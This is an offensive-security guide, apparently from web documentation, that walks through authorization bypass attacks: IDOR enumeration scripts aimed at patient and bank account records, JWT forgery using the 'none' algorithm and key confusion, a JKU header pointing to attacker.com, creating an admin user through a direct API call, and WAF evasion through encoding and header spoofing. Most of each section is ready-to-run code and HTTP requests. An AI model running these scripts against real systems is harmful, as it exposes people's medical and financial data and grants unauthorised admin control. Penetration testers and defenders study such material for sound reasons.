Authorization Bypass Exploitation¶
This guide provides detailed exploitation techniques for authorization bypass vulnerabilities, including real-world examples, code snippets, and step-by-step methodologies.
1. IDOR (Insecure Direct Object References) Exploitation¶
Technique Overview¶
IDOR allows attackers to access unauthorized resources by manipulating object references in URLs, parameters, or API endpoints.
Real-World Case: Healthcare Data Breach (2021)¶
A healthcare portal exposed patient records through IDOR vulnerabilities, allowing unauthorized access to sensitive medical information.
Exploitation Steps¶
Step 1: Identify Object References
GET /api/patient/12345 HTTP/1.1
Host: healthcare-portal.com
Authorization: Bearer user_token
Step 2: Test for IDOR
# Test sequential IDs
GET /api/patient/12346 HTTP/1.1
GET /api/patient/12347 HTTP/1.1
# Test UUIDs (if used)
GET /api/patient/550e8400-e29b-41d4-a716-446655440000 HTTP/1.1
Step 3: Automated IDOR Testing
import requests
def test_idor(base_url, start_id, end_id, auth_token):
vulnerable_ids = []
for patient_id in range(start_id, end_id + 1):
response = requests.get(
f"{base_url}/patient/{patient_id}",
headers={'Authorization': f'Bearer {auth_token}'}
)
if response.status_code == 200:
print(f"Vulnerable ID found: {patient_id}")
vulnerable_ids.append(patient_id)
return vulnerable_ids
# Usage
auth_token = "user_auth_token"
vulnerable = test_idor("https://healthcare-portal.com/api", 12340, 12350, auth_token)
Advanced IDOR Techniques¶
Parameter Pollution
# Original request
GET /api/user?id=12345 HTTP/1.1
# Parameter pollution attack
GET /api/user?id=12345&id=67890 HTTP/1.1
JSON Parameter Manipulation
POST /api/update-profile HTTP/1.1
Content-Type: application/json
{"user_id": "12345", "role": "user"}
# Modified request
{"user_id": "67890", "role": "admin"}
2. JWT Token Manipulation for Authorization Bypass¶
Technique Overview¶
JWT token manipulation allows attackers to modify token claims to escalate privileges or bypass authorization checks.
Real-World Case: Financial App Privilege Escalation (2022)¶
A fintech application failed to validate JWT signatures, allowing attackers to gain admin privileges.
Exploitation Steps¶
Step 1: Capture and Analyze JWT
import jwt
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2MzAwMDAwMDB9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
# Decode without verification
decoded = jwt.decode(token, options={"verify_signature": False})
print(decoded)
Step 2: Modify Privileges
# Change role to admin
decoded['role'] = 'admin'
decoded['isAdmin'] = True
decoded['permissions'] = ['read', 'write', 'delete']
# Create new token with 'none' algorithm
new_token = jwt.encode(decoded, key='', algorithm='none')
print(f"Modified token: {new_token}")
Step 3: Test Privilege Escalation
import requests
# Test with modified token
headers = {'Authorization': f'Bearer {new_token}'}
response = requests.get('https://app.com/admin/dashboard', headers=headers)
if response.status_code == 200:
print("Success! Admin access achieved.")
Advanced JWT Attacks¶
Key Confusion Attack
# If server accepts RS256 but we have public key
public_key = open('public.pem').read()
modified_token = jwt.encode(decoded, key=public_key, algorithm='HS256')
JKU Header Injection
decoded_header = {
"alg": "RS256",
"typ": "JWT",
"jku": "https://attacker.com/jwks.json"
}
3. Horizontal Privilege Escalation Exploitation¶
Technique Overview¶
Horizontal privilege escalation allows users to access resources of other users with the same privilege level.
Real-World Case: Banking App Data Exposure (2020)¶
A banking application allowed users to view account details of other customers by manipulating account numbers.
Exploitation Steps¶
Step 1: Enumerate User Resources
import requests
def enumerate_accounts(base_url, start_account, end_account, auth_token):
exposed_accounts = []
for account_num in range(start_account, end_account + 1):
response = requests.get(
f"{base_url}/accounts/{account_num}",
headers={'Authorization': f'Bearer {auth_token}'}
)
if response.status_code == 200:
account_data = response.json()
exposed_accounts.append(account_data)
print(f"Found account: {account_num} - {account_data['owner']}")
return exposed_accounts
# Usage
auth_token = "user_auth_token"
accounts = enumerate_accounts("https://bank-app.com/api", 1000, 1100, auth_token)
Step 2: Automated Account Testing
# Using Burp Suite Intruder
# Target: /api/accounts/§1000§
# Payload: Numbers from 1000 to 2000
4. Vertical Privilege Escalation Exploitation¶
Technique Overview¶
Vertical privilege escalation allows users to gain access to functionality reserved for higher privilege levels.
Real-World Case: E-commerce Admin Access (2021)¶
An e-commerce platform allowed regular users to access admin functionality by modifying session variables.
Exploitation Steps¶
Step 1: Identify Admin Functionality
GET /admin/dashboard HTTP/1.1
Host: ecommerce-site.com
Cookie: session=user_session
# Response: 403 Forbidden
Step 2: Session Manipulation
// Browser console manipulation
document.cookie = "role=admin; path=/";
document.cookie = "isAdmin=true; path=/";
localStorage.setItem('userRole', 'admin');
// Or modify session storage
sessionStorage.setItem('privileges', 'admin');
Step 3: Direct API Access
import requests
# Try direct admin API access
session_cookie = "user_session_id"
response = requests.post(
'https://ecommerce-site.com/admin/create-user',
cookies={'session': session_cookie},
json={'username': 'attacker', 'role': 'admin'}
)
if response.status_code == 200:
print("Vertical escalation successful!")
5. API Authorization Bypass Techniques¶
Technique Overview¶
API endpoints may have inadequate authorization checks, allowing unauthorized access to sensitive data.
Real-World Case: Mobile API Data Exposure (2022)¶
A mobile app API exposed user data through endpoints that didn't properly validate authorization.
Exploitation Methods¶
Endpoint Enumeration
# Discover API endpoints
gobuster dir -u https://api.example.com -w api-wordlist.txt
# Test common admin endpoints
/api/admin/users
/api/v1/admin
/api/management
/admin/api
Parameter Manipulation
# Normal user request
GET /api/user/profile HTTP/1.1
Authorization: Bearer user_token
# Admin endpoint attempt
GET /api/admin/users HTTP/1.1
Authorization: Bearer user_token
HTTP Method Manipulation
# GET request (denied)
GET /api/admin/users HTTP/1.1
# POST request (might work)
POST /api/admin/users HTTP/1.1
6. Automated Exploitation Tools¶
Burp Suite for Authorization Testing¶
# Using Burp Scanner
# Configure scan to include authorization tests
# Focus on parameter manipulation and endpoint testing
# Using Burp Intruder for IDOR
# Target: /api/users/§123§
# Payload: Sequential numbers or UUIDs
OWASP ZAP for Authorization Testing¶
# Run ZAP scan with authorization context
zap-baseline.py -t https://target.com -c auth-context
# Manual testing with ZAP
# Use forced browsing to test admin endpoints
Custom Exploitation Scripts¶
#!/usr/bin/env python3
import requests
import sys
def test_authorization_bypass(target_url, auth_token):
# Test common admin endpoints
endpoints = [
'/admin',
'/admin/dashboard',
'/api/admin/users',
'/management',
'/console'
]
for endpoint in endpoints:
response = requests.get(
f"{target_url}{endpoint}",
headers={'Authorization': f'Bearer {auth_token}'}
)
if response.status_code == 200:
print(f"Vulnerable endpoint: {endpoint}")
return True
return False
if __name__ == "__main__":
target = sys.argv[1]
token = sys.argv[2]
test_authorization_bypass(target, token)
7. Advanced Exploitation Techniques¶
JWT Tool Suite¶
# JWT cracking and manipulation
jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0In0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
# Automated JWT testing
jwt-scan https://target.com/api --cookie "token=eyJhbGciOi..."
Session Manipulation Tools¶
# Browser developer tools for session manipulation
# Chrome: F12 -> Application -> Storage
# Burp Suite for session manipulation
# Proxy -> Intercept -> Modify cookies
8. Defense Evasion Techniques¶
WAF Bypass for Authorization Testing¶
# URL encoding
GET /api/%61%64%6d%69%6e HTTP/1.1
# Double URL encoding
GET /api/%2561%2564%256d%2569%256e HTTP/1.1
# Case variation
GET /API/ADMIN/USERS HTTP/1.1
# Path traversal variations
GET /api/../admin/users HTTP/1.1
GET /api/..;/admin/users HTTP/1.1
Header Manipulation¶
# Add X-Forwarded-For header
GET /admin/dashboard HTTP/1.1
X-Forwarded-For: 127.0.0.1
# Modify User-Agent
GET /admin/dashboard HTTP/1.1
User-Agent: AdminBrowser/1.0
9. Real-World Exploitation Framework¶
Comprehensive Testing Methodology¶
- Reconnaissance: Identify authorization endpoints and mechanisms
- Testing: Apply various bypass techniques systematically
- Validation: Verify successful bypass and access level
- Documentation: Record findings and evidence
- Reporting: Provide detailed exploitation proof
Example Exploitation Chain¶
def authorization_exploitation_chain(target_url, auth_token):
# Test IDOR vulnerabilities
if test_idor_vulnerabilities(target_url, auth_token):
print("IDOR vulnerabilities found!")
# Test JWT manipulation
if test_jwt_manipulation(target_url, auth_token):
print("JWT manipulation successful!")
# Test privilege escalation
if test_privilege_escalation(target_url, auth_token):
print("Privilege escalation achieved!")
# Test API authorization bypass
if test_api_authorization(target_url, auth_token):
print("API authorization bypass successful!")
This comprehensive exploitation guide provides security professionals with the tools and techniques needed to identify and exploit authorization bypass vulnerabilities effectively while understanding the corresponding defensive measures.